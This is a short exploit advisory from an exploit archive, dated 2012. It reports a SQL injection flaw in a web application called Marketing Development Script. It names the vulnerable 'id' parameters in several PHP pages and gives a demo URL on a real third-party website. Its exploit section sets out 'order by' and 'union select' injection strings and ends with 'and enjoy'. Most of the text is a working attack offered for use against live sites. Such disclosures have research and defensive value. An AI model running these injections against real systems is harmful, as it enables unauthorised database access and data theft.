Marketing Development Script SQL Injection

2012-12-04T00:00:00
ID PACKETSTORM:118585
Type packetstorm
Reporter 3spi0n
Modified 2012-12-04T00:00:00

Description

                                        
                                            `# Exploit Title; Marketing Development Script SQL Injection Vulnerability  
# Date; 3/12/12  
# Author; 3spi0n  
# Script Vendor or Software Link; http://www.marketingdev.com/  
# Category; Webapps  
# Type; SQL Injection [MySQLi]  
# Tested on; Ubuntu 12.10 / Win7 / Backtrack 5  
  
[#] Demo Analyzing ;  
  
http://www.feralpitriathlon.it/gazzettino_articolo.php?id=90' [MySQLi Vuln.]  
  
[#] Vulnerable Details ;  
  
- MySQLi Vulnerable on sites  
  
[#] Vulnerable Files ;  
  
gazzettino_articolo.php?id= [query, variant of gazzettino_articolo.php file]  
album.php?id= [query, variant of album.php file]  
atleta.php?id= [query, variant of atleta.php file]  
  
[#] Exploit ;  
  
Order by command = gazzettino_articolo.php?id=4+order+by+8  
Union Select command =  
/gazzettino_articolo.php?id=4+union+select+1,2,3,4,5,6,7  
  
and enjoy.  
  
  
[#] Greetz ;  
  
- Grayhatz Corporation  
- My Official Blog, www.Ryuzaki.in  
- Facebook.Com/3spi0ne - Twitter.Com/bariiiscan  
`